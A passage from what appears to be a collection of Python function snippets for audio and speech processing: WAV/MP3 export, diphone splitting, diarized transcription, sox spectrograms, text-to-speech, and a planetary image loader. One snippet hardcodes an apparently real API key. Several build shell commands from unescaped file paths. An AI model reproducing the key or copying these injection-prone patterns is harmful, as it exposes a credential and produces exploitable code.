elif v.get() == 3:\r\n voice3(output_wavfile, DURATION, BLOCKLEN, RATE, WIDTH, CHANNELS)\r\n print(\"3. Roger, roger!\")\r\n elif v.get() == 4:\r\n voice4(output_wavfile, DURATION, RATE, WIDTH, CHANNELS)\r\n print(\"4\")\r\n elif v.get() == 5:\r\n manualControl(output_wavfile, DURATION, BLOCKLEN, RATE, WIDTH, CHANNELS)\r\n print(\"5\")\r\n\r\n # after whatever operation we do\r\n label['text'] = 'Successfully saved ' + output_wavfile + '.wav file'\r\n\r\n pass", "def split_diphones(wav_path, outdir=None):\n tg = ml.parsing.textgrid_reader.read(textgrid_path(wav_path))\n word = os.path.splitext(os.path.basename(wav_path))[0]\n\n wav_dir = os.path.dirname(wav_path)\n diphones_dir = os.path.join(wav_dir, \"diphones\")\n\n if not os.path.exists(diphones_dir):\n os.mkdir(diphones_dir)\n\n wav = AudioSegment.from_file(wav_path)\n for (begin, end, diphone) in tg[u'phones']:\n diphone = diphone.strip().replace(\"-\", \"_\")\n if len(diphone) > 0 and diphone[0] != \".\":\n diphone_file = \"{}_{}.wav\".format(diphone, word)\n diphone_path = os.path.join(diphones_dir, diphone_file)\n\n # Works in milliseconds\n segment = wav[(begin * 1000):(end * 1000)]\n print(\"Saving {} ({} - {})\".format(diphone_path, begin, end))\n segment.export(diphone_path, format=\"wav\")\n elif diphone[0] == \".\":\n print(\"skipping {}\".format(diphone))", "def load_audio(file_path):\n # load the audio file in its original sampling rate\n audio_data, sr = librosa.load(file_path, sr=sampling_rate)\n\n # get the common file name\n file_name = file_path.split(\"/\")[-1]\n file_name = file_name.split(\".wav\")[0]\n\n # calculate number of samples in the time duration needed\n num_samples = int(sr*time_duration)\n\n # get the cut-off audio signals and save them\n for i in np.arange(num_audio_files):\n audio_cut_data = cut_sample(audio_data, num_samples)\n file_path=dir_to_save + file_name + \"_\" + str(i+1) + \".wav\"\n save_sample(audio_cut_data, file_path, sr)\n print(f\"generating signal {str(i)}, its length {len(audio_cut_data)} by cutting the original signal\")", "def prepare_voicebank(\r\n data_folder, save_folder, 
valid_speaker_count=2, skip_prep=False\r\n):\r\n\r\n if skip_prep:\r\n return\r\n\r\n # Setting ouput files\r\n save_json_train = os.path.join(save_folder, TRAIN_JSON)\r\n save_json_valid = os.path.join(save_folder, VALID_JSON)\r\n save_json_test = os.path.join(save_folder, TEST_JSON)\r\n\r\n # Check if this phase is already done (if so, skip it)\r\n if skip(save_json_train, save_json_test, save_json_valid):\r\n logger.info(\"Preparation completed in previous run, skipping.\")\r\n return\r\n\r\n train_clean_folder = os.path.join(\r\n data_folder, \"clean_trainset_28spk_wav_16k\"\r\n )\r\n train_noisy_folder = os.path.join(\r\n data_folder, \"noisy_trainset_28spk_wav_16k\"\r\n )\r\n train_txts = os.path.join(data_folder, \"trainset_28spk_txt\")\r\n test_clean_folder = os.path.join(data_folder, \"clean_testset_wav_16k\")\r\n test_noisy_folder = os.path.join(data_folder, \"noisy_testset_wav_16k\")\r\n test_txts = os.path.join(data_folder, \"testset_txt\")\r\n\r\n # Setting the save folder\r\n if not os.path.exists(save_folder):\r\n os.makedirs(save_folder)\r\n\r\n # Additional checks to make sure the data folder contains Voicebank\r\n check_voicebank_folders(\r\n train_clean_folder,\r\n train_noisy_folder,\r\n train_txts,\r\n test_clean_folder,\r\n test_noisy_folder,\r\n test_txts,\r\n )\r\n\r\n logger.debug(\"Creating lexicon...\")\r\n lexicon = create_lexicon(os.path.join(data_folder, \"lexicon.txt\"))\r\n logger.info(\"Creating json files for noisy VoiceBank...\")\r\n\r\n logger.debug(\"Collecting files...\")\r\n extension = [\".wav\"]\r\n valid_speakers = TRAIN_SPEAKERS[:valid_speaker_count]\r\n wav_lst_train = get_all_files(\r\n train_noisy_folder, match_and=extension, exclude_or=valid_speakers,\r\n )\r\n wav_lst_valid = get_all_files(\r\n train_noisy_folder, match_and=extension, match_or=valid_speakers,\r\n )\r\n wav_lst_test = get_all_files(test_noisy_folder, match_and=extension)\r\n\r\n logger.debug(\"Creating json files for noisy VoiceBank...\")\r\n create_json(\r\n wav_lst_train, save_json_train, train_clean_folder, train_txts, lexicon\r\n )\r\n create_json(\r\n wav_lst_valid, save_json_valid, train_clean_folder, train_txts, lexicon\r\n )\r\n create_json(\r\n wav_lst_test, save_json_test, test_clean_folder, test_txts, lexicon\r\n )", "def write(f, sr, x, normalized=False):\n channels = 2 if (x.ndim == 2 and x.shape[1] == 2) else 1\n if normalized: # normalized array - each item should be a float in [-1, 1)\n y = np.int16(x * 2 ** 15)\n else:\n y = np.int16(x)\n song = pydub.AudioSegment(y.tobytes(), frame_rate=sr, sample_width=2, channels=channels)\n song.export(f, format=\"mp3\", bitrate=\"64k\")", "def transcribe_audio_to_tsv_with_diarization(input_audio_paths,\n output_tsv_path,\n sample_rate,\n language_code,\n speaker_count,\n begin_sec=0.0):\n client = speech.SpeechClient()\n enable_speaker_diarization = speaker_count > 0\n config = speech.RecognitionConfig(\n encoding=speech.RecognitionConfig.AudioEncoding.LINEAR16,\n sample_rate_hertz=sample_rate,\n audio_channel_count=1,\n enable_separate_recognition_per_channel=False,\n language_code=language_code,\n enable_speaker_diarization=enable_speaker_diarization,\n diarization_speaker_count=speaker_count)\n streaming_config = speech.StreamingRecognitionConfig(\n config=config, interim_results=False)\n requests = audio_data_generator(input_audio_paths, config)\n responses = client.streaming_recognize(streaming_config, requests)\n\n with open(output_tsv_path, \"w\" if not begin_sec else \"a\") as f:\n if not begin_sec:\n # Write the 
TSV header.\n f.write(tsv_data.HEADER + \"\\n\")\n utterances = []\n for response in responses:\n if not response.results:\n continue\n results = [result for result in response.results if result.is_final]\n max_confidence = -1\n best_transcript = None\n result_end_time = None\n for result in results:\n for alt in result.alternatives:\n if alt.confidence > max_confidence:\n max_confidence = alt.confidence\n best_transcript = alt.transcript.strip()\n diarized_words = [(\n word.word, word.speaker_tag, word.start_time.total_seconds(),\n word.end_time.total_seconds()) for word in alt.words]\n result_end_time = result.result_end_time\n if not best_transcript:\n continue\n end_time_sec = result_end_time.total_seconds()\n utterances.append(best_transcript)\n\n regrouped_utterances = regroup_utterances(utterances, diarized_words)\n utterance_counter = 0\n for (regrouped_utterance,\n speaker_index, start_time_sec, end_time_sec) in regrouped_utterances:\n utterance_counter += 1\n line = \"%.3f\\t%.3f\\t%s\\t%s [U%d] [Speaker #%d]\" % (\n start_time_sec + begin_sec,\n end_time_sec + begin_sec,\n tsv_data.SPEECH_TRANSCRIPT_TIER,\n regrouped_utterance,\n utterance_counter,\n speaker_index)\n print(line)\n f.write(line + \"\\n\")", "def create_spectrogram(sound_file, X, y):\n spec_file = sound_file.split(\"/\")[-1].split(\".\")[0] + \"_X\" + X + \"_y\" + y + \".png\"\n \n sound = AudioSegment.from_wav(sound_file)\n if len(sound)*(int(X)/1000) <= PIXEL_LIMIT: # max pixel limit\n command = \"sox \"+ sound_file + \" -n spectrogram -l -r -m -y \" + y + \" -X \" + X + \" -o \" + spec_file\n subprocess.call(command.split())\n return spec_file\n\n # If large file segment into chunks of smaller spectrogram and concatenate later\n chunk_size = int((PIXEL_LIMIT/int(X))*1000)\n start, stop = 0, chunk_size\n\n # Temporary folders to store temporary data in\n os.makedirs(\"sound_chunks\")\n os.makedirs(\"spec_chunks\")\n \n chunk_files = []\n chopping = True\n while chopping:\n if stop > len(sound):\n stop = len(sound)\n chopping = False\n\n # Create sound chop\n chunk_file = \"chunk\" + str(start) + \"-\" + str(stop)\n sound_chunk = sound[start:stop]\n sound_chunk.export(\"sound_chunks/\" + chunk_file + \".wav\", format=\"wav\")\n \n # Create spectrogram chop\n command = \"sox sound_chunks/\" + chunk_file + \".wav -n spectrogram -l -r -m -y \" + y + \" -X \" + X + \" -o spec_chunks/\" + chunk_file + \".png\"\n subprocess.call(command.split())\n\n # Remember filenames for concatenation later\n chunk_files.append(\"spec_chunks/\" + chunk_file + \".png\")\n start += chunk_size\n stop += chunk_size\n\n # Concatenate spectrograms into a big one\n cat_command = \"convert \"\n for chunk_file in chunk_files:\n cat_command+= chunk_file + \" \"\n cat_command += \"+append \" + spec_file\n subprocess.call(cat_command.split())\n shutil.rmtree(\"sound_chunks\")\n shutil.rmtree(\"spec_chunks\")\n return spec_file", "def normalize_audio(audio_path: str, output_path: str, name: str):\n sound = AudioSegment.from_file(audio_path + os.sep + name + '.wav',\n \"wav\")\n change_in_d_bfs = (-20.0) - sound.dBFS\n sound = sound.apply_gain(change_in_d_bfs)\n sound.export(output_path + os.sep + name + '.wav', format=\"wav\")", "def create_audiobook():\n\n f = open(\"static/files/book.txt\", \"r\", encoding=\"utf-8\")\n summary = f.read()\n print('total chars: ', len(summary))\n all_words = summary.split('.')\n aflr.api_key = \"b6b1434676d14bdfbf9f50ca2157ed5c\"\n VOICE=\"Matthew\"\n current, total_chars, chunk_num, TEXT = 0,0,0,[]\n while 
current < len(all_words) - 1:\n while total_chars <= 4999:\n TEXT.append(all_words[current])\n total_chars += len(all_words[current]) + 1\n current += 1\n if current == len(all_words):\n break\n \n if current < len(all_words):\n TEXT.pop()\n current -= 1\n total_chars = 0\n\n TEXT = \".\".join(TEXT)\n\n SPEED=80\n script = aflr.Script().create(\n scriptText=TEXT,\n projectName=\"may_the_4th\",\n moduleName=\"evil\",\n scriptName=f\"{chunk_num}_evil_{VOICE}\",\n )\n print(f\"Connect to the dev star: \\n {script} \\n\")\n\n scriptId = script[\"scriptId\"]\n\n response = aflr.Speech().create(\n scriptId=scriptId, voice=VOICE, speed=SPEED, #effect=EFFECT\n )\n # print(f\"Response from dev star: \\n {response} \\n\")\n # mastering current\n response = aflr.Mastering().create(\n scriptId=scriptId, #backgroundTrackId=BACKGROUNDTRACK\n )\n # print(f\"Using the force: \\n {response} \\n\")\n\n url = aflr.Mastering().retrieve(scriptId=scriptId)\n #print(f\"url to download the track: \\n {url} \\n\")\n\n # or download\n file = aflr.Mastering().download(\n scriptId=scriptId, destination=MINI_PATH\n )\n # print(f\"Listen to the results of the force: \\n {file} \\n\")\n\n print(\"finished\",chunk_num)\n\n TEXT = []\n chunk_num += 1\n\n play_audio()", "def dumpRecording(self, files):\n for tone, f in zip(self.tones, files):\n tone.dump_to_file(f)", "def write_data(infbfile,begin_N,dur_N,outfbfile):\n infbfile.seek_to_sample(begin_N)\n for i in range(begin_N,(begin_N+dur_N)):\n data = infbfile.read_sample()\n data.tofile(outfbfile)", "def save(stream, filename, path, sampling_rate=None, chunk_size=None):\n if chunk_size == None:\n chunk_size = stream.chunk_size\n\n if sampling_rate == None:\n raise Exception(\"You must specify the sampling rate in ArfStreamer.save\")\n \n with arf.open_file(filename, 'a') as file:\n path = path.split(\"/\")\n dst_name = path[-1]\n grp_path = \"/\".join(path[:-1])\n grp = file.require_group(grp_path) \n #Get first batch of data\n data = stream.read(chunk_size)\n try:\n dst = arf.create_dataset(grp, dst_name, data,\n maxshape=(None,), sampling_rate=sampling_rate)\n except:\n raise ValueError('Error, maybe dataset with that name already exists')\n while True:\n data = stream.read(chunk_size)\n if len(data) == 0:\n break\n arf.append_data(dst, data)\n file.flush()", "def save_face_track_files(self):\r\n\r\n # Check existence of tracking results\r\n if len(self.tracked_faces) == 0:\r\n\r\n # Try to load YAML file\r\n if os.path.exists(self.track_file_path):\r\n\r\n print 'Loading YAML file with tracking results'\r\n\r\n with open(self.track_file_path) as f:\r\n\r\n self.tracked_faces = yaml.load(f)\r\n\r\n print 'YAML file with tracking results loaded'\r\n\r\n else:\r\n\r\n print 'Warning! 
No tracking results found!'\r\n\r\n return\r\n\r\n # Delete already saved files\r\n if os.path.exists(self.compl_ann_path):\r\n\r\n ann_files = os.listdir(self.compl_ann_path)\r\n\r\n for ann_file in ann_files:\r\n ann_file_path = os.path.join(self.compl_ann_path, ann_file)\r\n os.remove(ann_file_path)\r\n\r\n else:\r\n\r\n os.makedirs(self.compl_ann_path)\r\n\r\n # Delete already saved files\r\n if os.path.exists(self.simple_ann_path):\r\n\r\n ann_files = os.listdir(self.simple_ann_path)\r\n\r\n for ann_file in ann_files:\r\n ann_file_path = os.path.join(self.simple_ann_path, ann_file)\r\n os.remove(ann_file_path)\r\n\r\n else:\r\n\r\n os.makedirs(self.simple_ann_path)\r\n\r\n # Get minimum segment duration\r\n min_duration = c.MIN_SEGMENT_DURATION\r\n\r\n if ((self.params is not None) and\r\n (c.MIN_SEGMENT_DURATION_KEY in self.params)):\r\n min_duration = self.params[c.MIN_SEGMENT_DURATION_KEY]\r\n\r\n # Save unique tags\r\n tags = []\r\n\r\n for segment_dict in self.tracked_faces:\r\n\r\n ann_tag = segment_dict[c.ANN_TAG_KEY]\r\n\r\n if (ann_tag != c.UNDEFINED_TAG) and (ann_tag not in tags):\r\n tags.append(ann_tag)\r\n\r\n for tag in tags:\r\n\r\n # Create complete annotations\r\n person_dict = {}\r\n\r\n # Create simple annotations\r\n simple_dict = {c.ANN_TAG_KEY: tag}\r\n\r\n person_dict[c.ANN_TAG_KEY] = tag\r\n\r\n segment_list = []\r\n\r\n simple_segment_list = []\r\n\r\n tot_dur = 0\r\n\r\n # Iterate through all tracked faces in video\r\n for segment_dict in self.tracked_faces:\r\n\r\n ann_tag = segment_dict[c.ANN_TAG_KEY]\r\n\r\n if ann_tag == tag:\r\n\r\n segment_list.append(segment_dict)\r\n\r\n simple_seg_dict = {}\r\n\r\n start = segment_dict[c.SEGMENT_START_KEY]\r\n\r\n simple_seg_dict[c.SEGMENT_START_KEY] = start\r\n\r\n dur = segment_dict[c.SEGMENT_DURATION_KEY]\r\n\r\n tot_dur = tot_dur + dur\r\n\r\n simple_seg_dict[c.SEGMENT_DURATION_KEY] = dur\r\n\r\n simple_segment_list.append(simple_seg_dict)\r\n\r\n person_dict[c.SEGMENTS_KEY] = segment_list\r\n\r\n simple_dict[c.SEGMENTS_KEY] = simple_segment_list\r\n\r\n person_dict[c.TOT_SEGMENT_DURATION_KEY] = tot_dur\r\n\r\n simple_dict[c.TOT_SEGMENT_DURATION_KEY] = tot_dur\r\n\r\n file_name = tag + '.YAML'\r\n\r\n # Save complete annotations\r\n\r\n file_path = os.path.join(self.compl_ann_path, file_name)\r\n\r\n utils.save_YAML_file(file_path, person_dict)\r\n\r\n # Save simple annotations\r\n\r\n file_path = os.path.join(self.simple_ann_path, file_name)\r\n\r\n utils.save_YAML_file(file_path, simple_dict)", "def quicksavefile(directory, text, format=\".out\"):\n print(text)\n print(directory)\n directory = directory.split(\".\")\n del directory[-1]\n directory.append(format)\n s = \"\".join(directory)\n file = open(s, \"w\")\n file.write(text)\n file.close()", "def generate_seg_file(self, set_speakers=True):\n result = ''\n for clu in self._clusters:\n result += self._clusters[clu]._get_seg_repr(set_speakers)\n f_seg = open(self.get_file_basename() + '.seg', 'w')\n f_seg.write(result)\n f_seg.close()", "def get_audio(name, n):\n audio_path = os.path.join(args.input_folder, name, \"audio.ogg\")\n if not os.path.exists(audio_path):\n ## Some folders have multiple .ogg files, so we need to first combine them into one file. 
Example:\n ## |── Universe\n ##  │   ├── aligned.swc\n ##  │   ├── audio1.ogg\n ##  │   ├── audio2.ogg\n ##  │   ├── audio3.ogg\n ##  │   ├── audio4.ogg\n ##  │   ├── audiometa.txt\n ##  │   ├── info.json\n ##  │   ├── wiki.html\n ##  │   ├── wiki.txt\n ##  │   └── wiki.xml\n\n multiple_ogg_files = []\n for i in range(1, 5):\n path = os.path.join(args.input_folder, name, \"audio\" + str(i) + \".ogg\")\n if os.path.exists(path):\n multiple_ogg_files.append(path)\n else:\n break\n if len(multiple_ogg_files) == 0:\n return\n elif len(multiple_ogg_files) == 1:\n os.system(\"cp \\\"\" + multiple_ogg_files[0] + \"\\\" \\\"\" + audio_path + \"\\\"\")\n else:\n tmp_file_name = \"ffmeg_inputs.txt\"\n print(\"tmp_file_name=\", tmp_file_name)\n with open(tmp_file_name, \"w\", encoding=\"utf-8\") as tmp_file:\n for path in multiple_ogg_files:\n tmp_file.write(\"file '\" + path + \"'\\n\")\n cmd = \"ffmpeg -f concat -i \\\"\" + tmp_file_name + \"\\\" -c copy \\\"\" + audio_path + \"\\\"\"\n print(cmd)\n os.system(cmd)\n\n output_audio_path = args.destination_folder + \"/audio/\" + str(n) + \".ogg\"\n os.system(\"cp \\\"\" + audio_path + \"\\\" \" + output_audio_path)", "def record(options):\n signal = audio.record(rate=22050, secs=options.secs,\n store=True, opath=options.opath)\n if options.plot:\n plotter.plot(**{options.opath: signal.data})", "def save(self, filename):\n target = open(filename, 'w')\n target.write(\"\\\\data\\\\\\n\")\n target.write(\"ngram 1=\" + str(len(self.f1)) + \"\\n\\n\")\n target.write(\"\\\\1-grams:\\n\")\n for w,p in sorted(self.f1.items()): \n target.write(str(p) + \" \" + w + \"\\n\")\n target.write(\"\\\\end\\\\\\n\")\n target.close()", "def save_wav(file_name, signal, fs):\n wavfile.write(file_name, fs, np.int16(signal/np.max(np.abs(signal)) * (2**(16)/2-1)))", "def build_transcript(speaker_label_transcript):\n with open('main_transcript.txt', 'a') as the_file:\n for t in speaker_label_transcript:\n the_file.write(f\"{t['speaker']}:\\n\")\n the_file.write(f\"{t['content']}\\n\\n\")", "def transcribe(self, segment) -> str:\n segment_as_wav = segment.export(format=\"wav\")\n with wave.open(segment_as_wav, 'r') as w:\n frames = w.getnframes()\n buffer = w.readframes(frames)\n data = np.frombuffer(buffer, dtype=np.int16)\n\n return self.ds.stt(data)", "def read_mastcam_dir(self, filepath, suffix, unit, feature, extension = '.IMG', lblext='.LBL_label', eye='LR', margin=6):\n \n if eye == 'L':\n eyez = 'ML'\n elif eye == 'R':\n eyez = 'MR'\n elif eye == 'LR':\n eyez = ''\n pass\n else:\n raise ValueError('Eye name %s is not valid! Use L, R, or LR.' 
% eye)\n \n # GET ALL FILES WITH GIVEN EXTENSION IN FILEPATH\n files = sorted(glob.glob(str(filepath) + \"*\" + eyez + \"*\" + str(suffix) + \"*\" + str(extension)))\n fileprefixes = sorted(list(set([f.split('/')[-1][0:12] for f in files])))\n print(fileprefixes)\n \n print(\"found %d files among %d sequences with eye %s and extension %s in %s:\" % (len(files), len(fileprefixes), eye, extension, filepath))\n assert len(files) > 0\n \n numfiles = len(fileprefixes)\n seen = 0\n percent = 0.0\n printed = [False for foo in range(1000)]\n \n fullimages = {}\n segmentation = {}\n\n data = []\n self.labels = []\n \n for fileprefix in fileprefixes:\n print(\" \" + fileprefix)\n \n thissequence = sorted(glob.glob(str(filepath) + fileprefix + \"*\" + str(suffix) + \"*\" + str(extension)))\n asdfghjkl = 0\n \n parser = Parser()\n seqfiltstr = \"\"\n dimlist = []\n for w in thissequence:\n labels = parser.parse(open_pds(w.replace(extension, lblext))) \n filt = labels['INSTRUMENT_STATE_PARMS']['FILTER_NAME'][9]\n seqfiltstr += filt\n h = int(labels['IMAGE']['LINES'])\n w = int(labels['IMAGE']['LINE_SAMPLES'])\n dimlist.append([h, w])\n #print(\" %s %s %s\" % (filt, h, w))\n\n print(\"Filter name:\", labels['INSTRUMENT_STATE_PARMS']['FILTER_NAME'])\n \n #print(seqfiltstr)\n # print(dimlist)\n seqstocombine = []\n \n # Handle cases which appear to be several series of observations\n if len(seqfiltstr) % 7 == 0:\n for i in range(len(seqfiltstr) // 7):\n subseq = thissequence[7*i:7*i+7]\n subseqfilt = seqfiltstr[7*i:7*i+7]\n if subseqfilt == '0123456':\n cont = False\n for j in range(7*i, 7*i+7):\n if dimlist[7*i] != dimlist[j]:\n print(\"SIZE ERROR\")\n cont = True\n if cont:\n continue\n \n seqstocombine.append(subseq)\n \n else:\n if seqfiltstr == '00112233445566':\n seq1 = [thissequence[2*i] for i in range(len(thissequence) // 2)]\n seq2 = [thissequence[2*i+1] for i in range(len(thissequence) // 2)]\n \n seqstocombine.append(seq1)\n seqstocombine.append(seq2)\n \n break\n else:\n print(\"Length multiple of 7 but bad sequence\")\n\n # Non-7 number of observations\n else:\n for i in range(len(seqfiltstr)):\n subseq = thissequence[i:i+7]\n subseqfilt = seqfiltstr[i:i+7]\n if subseqfilt == '0123456':\n cont = False\n for j in range(i, i+7):\n if dimlist[i] != dimlist[j]:\n print(\"SIZE ERROR\")\n cont = True\n if cont: continue\n \n seqstocombine.append(subseq)\n \n # No actual multispectral images exist, so use all RGB (sol 388)\n if len(seqstocombine) == 0 and 'sol388' in self.archive:\n seqstocombine = [[f] for f in thissequence]\n \n # Now, download each sequence with this prefix\n for subseq in seqstocombine:\n qwertyuiop = 0\n bigimage = None\n \n err = False\n # Get each image within sequence\n for filename in subseq:\n namestem = filename.split('.')[0].split('/')[-1]\n\n try:\n (image, lbls) = self.load_image(namestem, filepath, ext=extension, lblext=lblext)\n except ValueError as e:\n #print(\"An error happened while processing %s\" % filename)\n err = True\n break\n\n (h, w, b) = image.shape\n \n if b == 3:\n self.rgbdict[fileprefix + str(asdfghjkl)] = namestem\n fullimages[fileprefix + str(asdfghjkl)] = image\n #print(\"Stored %s to rgbdict\" % (fileprefix + str(asdfghjkl)))\n \n if bigimage == None and 'sol388' not in filepath:\n bigimage = np.zeros([h, w, 9], dtype='uint8')\n elif bigimage == None:\n bigimage = np.zeros([h, w, b], dtype='uint8')\n \n bigimage[:,:,qwertyuiop:qwertyuiop+b] = image\n\n qwertyuiop += b\n \n\n # Reorder images based on camera so filters are ordered\n if eye in 
['L', 'R']:\n bi = np.zeros([h, w, 9], dtype='uint8')\n if eye == 'L':\n bi[:, :, 0] = bigimage[:, :, 0]\n bi[:, :, 1] = bigimage[:, :, 1]\n bi[:, :, 2] = bigimage[:, :, 2]\n bi[:, :, 3] = bigimage[:, :, 4]\n bi[:, :, 4] = bigimage[:, :, 3]\n bi[:, :, 5] = bigimage[:, :, 6]\n bi[:, :, 6] = bigimage[:, :, 5]\n bi[:, :, 7] = bigimage[:, :, 7]\n bi[:, :, 8] = bigimage[:, :, 8]\n elif eye == 'R':\n bi[:, :, 0] = bigimage[:, :, 2]\n bi[:, :, 1] = bigimage[:, :, 1]\n bi[:, :, 2] = bigimage[:, :, 0]\n bi[:, :, 3] = bigimage[:, :, 4]\n bi[:, :, 4] = bigimage[:, :, 3]\n bi[:, :, 5] = bigimage[:, :, 5]\n bi[:, :, 6] = bigimage[:, :, 6]\n bi[:, :, 7] = bigimage[:, :, 7]\n bi[:, :, 8] = bigimage[:, :, 8]\n bigimage = bi\n\n if err:\n print(\" ...didn't load sequence. There was an error.\")\n continue\n \n print(\" ...loaded one sequence:\", (fileprefix + str(asdfghjkl)))\n \n if 'sol388' not in self.archive:\n name = fileprefix + str(asdfghjkl) + '_' + unit + '_' + feature\n else:\n name = namestem + '_' + unit + '_' + feature\n\n \n (segments, segmentlabels) = self.segment_image(bigimage, unit=unit)\n segmentation[fileprefix + str(asdfghjkl)] = segments[0][1]\n\n for i in range(len(segments)):\n data += [[float(x) for x in self.process_image(segments[i], name + segmentlabels[i], feature=feature)]]\n \n asdfghjkl += 1\n \n ###########################################\n \n seen += 1\n \n # output read-in progress\n if percent < 100:\n if (round((seen / float(numfiles)) * 100, 1) >= percent) and (printed[int(percent * 10)] == False):\n #print(\"...%3.1f%%...\" % percent)\n printed[int(percent * 10)] == True\n percent = round(((seen / float(numfiles)) * 100), 1) + 1\n print(\"...100%...\")\n print(\"Transposing data...\")\n data = np.array(data).T\n self.xvals.sort()\n \n # Output the pickle\n print(\"Writing pickle to \" + self.archive + \" ...\")\n outf = open(self.archive, 'w')\n pickle.dump((data, fullimages, segmentation, self.labels, self.xlabel, self.ylabel, self.xvals, self.rgbdict, self.lblext, self.initdata, self.initfilename), outf)\n outf.close()\n print(\"Wrote pickle to \" + self.archive)", "def onefile(yr):\r\n\r\n global MF\r\n filename = \"{0}/yob{1:4d}.txt\".format(dirname, yr)\r\n f = open(filename, \"r\")\r\n for l in f:\r\n cols = l.strip().split(\",\")\r\n name = cols[0]\r\n gender = cols[1]\r\n cnt = float(cols[2])\r\n if not (name in MF[gender]):\r\n #print(MF)\r\n #print('this is after')\r\n MF[gender][name] = [0.0 for x in range(firstyr, lastyr)]\r\n #print(MF)\r\n #print(len(MF[gender][name]))\r\n MF[gender][name][yr-firstyr] = cnt\r\n #print(MF)\r\n f.close()", "def text_to_file(phase, filename):\n path = \"sons/%s\" % filename # caminho para arquivo\n\n # gera e salva frase pelo gTTS\n voice = gTTS(phase, lang='pt')\n voice.save(path)\n\n return path", "def start():\r\n\r\n total_files = sum([len(files) for r, d, files in os.walk(abs_source_directory)])\r\n total_files_down = total_files\r\n for i in range(total_files, 0, -1):\r\n if i % 10 == 0:\r\n total_files_down = i\r\n break\r\n current_iteration = 0\r\n last_factor = 0\r\n position = 1\r\n print(\"[{0}] {1}/{2}\".format(\" \" * 10, 0, total_files))\r\n for path, dirs, files in os.walk(abs_source_directory):\r\n for file_name in list(filter(lambda x: x.endswith(\".pdf\"), files)):\r\n file_source_path = os.path.join(path, file_name)\r\n out = re.search(normal_regex, file_source_path)\r\n # Handles normal past-papers\r\n try:\r\n found_groups = out.groups()\r\n write_copy(file_source_path, file_name, 
matched_groups=found_groups)\r\n except AttributeError:\r\n # Handles music past-papers\r\n if \"Music_\" in file_source_path:\r\n out = re.search(audio_music_regex, file_source_path)\r\n try:\r\n found_groups = out.groups()\r\n write_copy(file_source_path, file_name, music_groups=found_groups)\r\n except AttributeError:\r\n print(f\"CRITICAL ERROR: File not handled: {file_source_path}\")\r\n elif \"Exam Pack list of omitted papers and markschemes\" in file_name:\r\n pass\r\n else:\r\n print(f\"CRITICAL ERROR: File not handled: {file_source_path}\")\r\n current_iteration += 1\r\n if current_iteration == last_factor + total_files_down / 10:\r\n last_factor = current_iteration\r\n print(\"[{0}{1}] {2}/{3}\".format(\"-\" * position, \" \" * (10 - position), current_iteration, total_files))\r\n position += 1\r\n # Handles mp3 files\r\n for file_name in list(filter(lambda x: x.endswith(\".mp3\"), files)):\r\n file_source_path = os.path.join(path, file_name)\r\n out = re.search(audio_music_regex, file_source_path)\r\n try:\r\n found_groups = out.groups()\r\n write_copy(file_source_path, file_name, audio_groups=found_groups)\r\n except AttributeError:\r\n print(f\"CRITICAL ERROR: File not handled: {file_source_path}\")\r\n current_iteration += 1\r\n if current_iteration == last_factor + total_files_down / 10:\r\n last_factor = current_iteration\r\n print(\"[{0}{1}] {2}/{3}\".format(\"-\" * position, \" \" * (10 - position), current_iteration, total_files))\r\n position += 1\r\n print(\"[{0}] {1}/{2}\".format(\"-\" * 10, total_files, total_files))", "def save_chunks(chunk_sound, out_path, video_id):\n chunk_start_ms = int(chunk_sound.get_start_time()*1000)\n chunk_end_ms = int(chunk_sound.get_end_time()*1000)\n chunk_duration = chunk_end_ms - chunk_start_ms\n\n chunk_fn = '{0}_{1}_{2}.wav'.format(video_id, chunk_start_ms, chunk_end_ms)\n chunk_file_path = path.join(out_path, chunk_fn)\n chunk_sound.save(chunk_file_path, 'WAV')\n\n return {'filename': chunk_fn, 'video_id': video_id, 'start_time': chunk_start_ms, 'end_time': chunk_end_ms, 'duration': chunk_duration}", "def write(self, filename):\n assert filename[-3:]=='.fz','name must end in .fz'\n\n files.makedir_fromfile(filename)\n\n ucfilename=filename[0:-3]\n bname = os.path.basename(ucfilename)\n\n tmp_path = os.path.join(\n files.get_temp_dir(),\n bname,\n )\n files.makedir_fromfile(tmp_path)\n\n with TempFile(tmp_path) as tfile:\n super(CosmosMEDSMaker,self).write(tfile.path)\n self._compress_meds_file(tfile.path, filename)", "def read_word(label_paths, save_path=None):\n print('===> Reading word segmentation...')\n p, i = ProgressBar(max_value=len(label_paths)), 0\n speaker_dict = {}\n word_set, char_set = set([]), set([])\n for label_path in p(label_paths):\n utterance_dict = {}\n with open(label_path, 'r') as f:\n for line in f:\n line = line.strip().split(' ')\n speaker_name = line[0].split('-')[0]\n utt_index = line[0].split('-')[-1]\n start_time = float(line[1])\n end_time = float(line[2])\n # convert to lowercase\n word_original = ' '.join(line[3:]).lower()\n\n # clean transcript\n transcript = fix_transcript(word_original, speaker_name)\n\n # skip silence\n if transcript == '':\n continue\n\n # remove head & last space\n # if transcript[0] == ' ':\n # transcript = transcript[1:]\n # if transcript[-1] == ' ':\n # transcript = transcript[:-1]\n\n # convert from character to phone\n # phone_list = ['SIL']\n # keys = pronounce_dict.keys()\n # for word in transcript.split(' '):\n # if word in keys:\n # 
phone_list.append(pronounce_dict[word])\n # phone_list.append('SIL')\n # else:\n # print(transcript.split(' '))\n\n # convert to phone list where each element is phone (remove ' ')\n # phone_seq = ' '.join(phone_list)\n # phone_list = phone_seq.split(' ')\n\n for char in list(word):\n if char == '':\n print(list(word))\n char_set.add(char)\n\n # utterance_dict[utt_index] = [start_time, end_time, phone_list]\n # speaker_dict[speaker_name] = utterance_dict\n\n p.update(i + 1)\n i += 1\n time.sleep(0.01)\n\n char_set = sorted(list(char_set))\n print(len(char_set))\n\n # make mapping file (from phone to number)\n # if not os.path.isfile(os.path.abspath('../phone2num.txt')):\n # with open(os.path.abspath('../phone2num.txt'), 'w') as f:\n # index = 0\n # for phone in phones:\n # f.write('%s %s\\n' % (phone, str(index)))\n # index += 1\n #\n # if save_path is not None:\n # print('Saving target labels...')\n # for speaker_name, utterance_dict in p_save(speaker_dict.items()):\n # save_path_speaker = mkdir(os.path.join(save_path, speaker_name))\n # for utt_index, utt_info in utterance_dict.items():\n # start_time, end_time, phone_list = utt_info\n # save_file_name = speaker_name + '_' + utt_index + '.npy'\n #\n # # convert from phone to number\n # phone_index_list = phone2num(phone_list)\n #\n # # save as npy file\n # np.save(os.path.join(save_path_speaker, save_file_name), phone_index_list)\n #\n #\n\n return speaker_dict", "def write_wav(fname, samps, sampling_rate=16000, normalize=True):\n\t# for multi-channel, accept ndarray [Nsamples, Nchannels]\n\tif samps.ndim != 1 and samps.shape[0] < 